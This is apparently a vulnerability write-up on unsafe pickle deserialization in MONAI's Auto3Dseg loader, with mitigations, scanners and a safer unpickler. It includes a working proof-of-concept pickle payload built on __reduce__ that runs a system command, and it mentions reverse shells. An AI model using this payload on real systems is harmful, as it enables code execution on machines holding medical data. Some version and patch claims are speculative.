Researchers have disclosed a critical remote code execution (RCE) vulnerability in MONAI, an open-source, PyTorch-based framework for medical imaging AI. The flaw sits in the algo_from_pickle function in monai/auto3dseg/utils.py, which calls pickle.loads() on file contents without validating them, so a crafted file can run arbitrary code when it is loaded. It affects anyone who loads algorithm files in Auto3Dseg, MONAI’s tool for automating the search for 3D medical image segmentation algorithms.

MONAI powers deep learning workflows in healthcare, from tumor detection to organ segmentation. With over 3,000 GitHub stars and adoption by institutions like NVIDIA and Mayo Clinic, it processes sensitive DICOM scans and patient data. Auto3Dseg speeds up model selection by loading pre-trained algorithms from pickle files, which is convenient but becomes a backdoor when those files come from untrusted sources such as shared repositories or collaborators.

Vulnerability Details

The vulnerable code opens a pickle file, reads its bytes, and deserializes without checks:

    def algo_from_pickle(pkl_filename: str, template_path: PathLike | None = None, **kwargs: Any) -> Any:
        with open(pkl_filename, "rb") as f_pi:
            data_bytes = f_pi.read()
        data = pickle.loads(data_bytes)

Python’s pickle module can execute arbitrary code during deserialization, a pitfall known for as long as the module has existed. An attacker only needs an object whose __reduce__ method returns a callable and its arguments; the unpickler invokes that callable on load, so it can run system commands. The advisory does not specify affected versions, but any MONAI install that uses Auto3Dseg without the fix is exposed, likely releases such as 1.3.x or earlier. Check your installed version with pip show monai.
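To see the mechanism without running anything dangerous, here is a minimal sketch with a benign payload. The class name Harmless and the choice of sorted as the callable are illustrative assumptions, not taken from the advisory; the point is only that pickle.loads returns whatever the stored callable returns.

```python
import pickle


class Harmless:
    """Stand-in for an attacker-controlled object; the payload here is benign."""

    def __reduce__(self):
        # pickle stores this (callable, args) pair. On load, the unpickler
        # calls callable(*args) and uses the return value as the "object".
        return (sorted, ([3, 1, 2],))


payload = pickle.dumps(Harmless())  # serializing does not call sorted
result = pickle.loads(payload)      # deserializing does

# The loader never rebuilt a Harmless instance; it called sorted() instead.
print(type(result).__name__, result)
```

Replacing sorted with subprocess.call is all it takes to turn this into the exploit described next, which is why the data alone decides what code runs.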

A proof of concept exploits this directly. First, generate a malicious pickle:

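    import pickle
    import subprocess


    class MaliciousAlgo:
        def __reduce__(self):
            # On load, the unpickler calls subprocess.call(['calc.exe']).
            return (subprocess.call, (['calc.exe'],))


    # Inner pickle: the payload itself.
    malicious_algo_bytes = pickle.dumps(MaliciousAlgo())

    # Outer pickle: a dict with the "algo_bytes" key, wrapping the payload.
    attack_data = {
        "algo_bytes": malicious_algo_bytes,
    }

    attack_pickle_file = "attack_algo.pkl"
    with open(attack_pickle_file, "wb") as f:
        f.write(pickle.dumps(attack_data))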



Then load it with MONAI:

    from monai.auto3dseg.utils import algo_from_pickle

    attack_pickle_file = "attack_algo.pkl"
    result = algo_from_pickle(attack_pickle_file)

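On Windows, this launches calc.exe; on Linux an attacker would substitute /bin/sh or a reverse shell. The attack is file-based, so it needs a victim to load the file, but attackers can email or host a malicious pickle, or plant it where a pipeline or server loads algorithm files automatically.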
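Because loading is what triggers the payload, one defensive option is to inspect a pickle's opcodes without executing them. The sketch below uses the standard-library pickletools.genops for that. The helper name referenced_globals is hypothetical, and the string tracking used for STACK_GLOBAL is a heuristic that a determined attacker could evade, so treat it as a triage aid rather than a guarantee.

```python
import pickle
import pickletools
import subprocess

_STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}
_BYTES_OPS = {"SHORT_BINBYTES", "BINBYTES", "BINBYTES8"}


def referenced_globals(data: bytes) -> set[tuple[str, str]]:
    """List (module, name) pairs a pickle would import, without loading it."""
    found = set()
    strings = []  # string literals seen so far, used to resolve STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in _STRING_OPS:
            strings.append(arg)
        elif opcode.name == "GLOBAL":  # protocols 0-3: arg is "module name"
            module, _, name = arg.partition(" ")
            found.add((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Protocol 4+: module and name are normally the two most
            # recently pushed strings (heuristic, not a full stack model).
            found.add((strings[-2], strings[-1]))
        elif opcode.name in _BYTES_OPS:
            # Embedded bytes may be a nested pickle, as in the PoC's
            # "algo_bytes" entry; bytes that do not parse are ignored.
            try:
                found |= referenced_globals(arg)
            except Exception:
                pass
    return found


class _Payload:
    def __reduce__(self):
        return (subprocess.call, (["true"],))


# Build the same nested layout as the PoC. Nothing is ever unpickled here.
nested = pickle.dumps({"algo_bytes": pickle.dumps(_Payload())})
findings = referenced_globals(nested)
print(sorted(findings))
```

A file whose findings include modules such as subprocess, os, or builtins deserves suspicion before anything calls algo_from_pickle on it.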

Impact and Why It Matters

RCE means the attacker’s code runs with the privileges of the process that loaded the file, which can amount to full compromise of the host. In medical AI environments, which often sit on isolated networks or HIPAA-compliant clouds, that can expose patient scans and PHI or provide a foothold into hospital networks. Auto3Dseg targets researchers who share algorithms, and a tainted pickle from a conference dataset or a Kaggle-like repository executes as soon as it is loaded. There is precedent: unsafe pickle deserialization has been reported repeatedly across Python ML tooling, including TensorFlow, scikit-learn extensions, and Jupyter notebooks.

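Consider the scale: MONAI runs on GPU servers in data centers that process terabytes of MRI and CT data. A successful exploit gives the attacker whatever access the loading process has, which is enough to deploy ransomware or exfiltrate data, and amounts to root if the job runs as root. One caveat: the exploit is user-triggered, so there is no remote attack without social engineering or a poisoned file source. In collaborative medical AI, though, that trust breaks easily. It also undermines Auto3Dseg’s value: the tool reportedly cuts annotation time by 80% in benchmarks, but its pickle files now need auditing before use.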

Mitigation Steps

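Patch immediately if a fixed release is available. The maintainers have likely addressed the issue after disclosure through input validation or a safer loader, but confirm this rather than assume it: review the history of monai/auto3dseg/utils.py (for example, git log -p -- monai/auto3dseg/utils.py) for changes that restrict the pickle.loads calls.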
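As an illustration of what a safer loader can look like, the sketch below follows the "restricting globals" pattern from the Python pickle documentation: subclass pickle.Unpickler and override find_class so that only allowlisted names resolve. This is not MONAI's actual fix, which the advisory does not describe. The allowlist contents and the names AllowlistUnpickler and restricted_loads are assumptions made for the example.

```python
import io
import pickle

# Hypothetical allowlist: only these (module, name) pairs may be imported
# while unpickling. Plain dicts, lists, strings, and numbers need no entry.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks to import a global.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is not allowed")


def restricted_loads(data: bytes):
    """Drop-in analogue of pickle.loads that rejects unlisted globals."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


print(restricted_loads(pickle.dumps({"name": "segresnet", "folds": [0, 1]})))
```

A payload like the PoC's fails here because subprocess.call is not on the list. The trade-off is that real algorithm objects are class instances, so a practical allowlist would have to name every class they legitimately contain.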

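Broader fixes: never load untrusted pickles. Validate sources by signing files (for example with GPG) and verifying them before loading, and use JSON or YAML for configs so that only plain data structures are serialized. joblib and dill are not safer alternatives for untrusted input: both build on pickle and can execute code on load in the same way. In production, sandbox the loading step with firejail or a Docker seccomp profile.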
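A lightweight complement to GPG signing is pinning a known-good digest and refusing to unpickle anything that does not match. The sketch below is one way to do that with hashlib; the function name load_if_trusted is hypothetical, and it assumes the expected SHA-256 value reaches you through a channel the attacker cannot modify.

```python
import hashlib
import hmac
import pickle
from pathlib import Path


def load_if_trusted(path, expected_sha256: str):
    """Unpickle `path` only if its SHA-256 digest matches the pinned value."""
    # Read once and hash the same bytes that get unpickled, so the file
    # cannot be swapped between the check and the load.
    data = Path(path).read_bytes()
    actual = hashlib.sha256(data).hexdigest()
    if not hmac.compare_digest(actual, expected_sha256.lower()):
        raise ValueError(f"digest mismatch for {path}: got {actual}")
    return pickle.loads(data)
```

A matching digest proves the file is the one its publisher hashed, not that its contents are benign, so this only helps when the publisher is trusted.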

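Run grep -rnE 'pickle\.loads?' /path/to/monai to hunt for similar call sites; the pattern matches both pickle.load and pickle.loads. For medical AI deployments, enforce signed artifacts, for instance for models packaged under the MONAI Bundle spec. This vulnerability highlights a deserialization trap in Python ML that is more than 20 years old yet persists. Teams should audit now, especially if Auto3Dseg runs automatically in their pipelines.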
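A text search also matches comments and strings. As a rough alternative, the following sketch walks the syntax tree so that only real call sites are reported. The function names find_pickle_calls and scan_tree are hypothetical, and the check is deliberately narrow: it only catches the pickle.load(...) and pickle.loads(...) spellings, so aliased imports such as from pickle import loads will slip past it.

```python
import ast
from pathlib import Path


def find_pickle_calls(source: str, filename: str = "<string>"):
    """Return sorted (line, call) pairs for pickle.load / pickle.loads calls."""
    hits = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)
            and node.func.attr in {"load", "loads"}
            and isinstance(node.func.value, ast.Name)
            and node.func.value.id == "pickle"
        ):
            hits.append((node.lineno, f"pickle.{node.func.attr}"))
    return sorted(hits)


def scan_tree(root):
    """Print every pickle.load(s) call site in the .py files under `root`."""
    for path in sorted(Path(root).rglob("*.py")):
        try:
            source = path.read_text(encoding="utf-8")
            hits = find_pickle_calls(source, str(path))
        except (SyntaxError, UnicodeDecodeError):
            continue  # skip files that cannot be read or parsed
        for lineno, call in hits:
            print(f"{path}:{lineno}: {call}")
```

Calling scan_tree on the directory of an installed monai package lists the call sites to review by hand; the source is parsed, never executed.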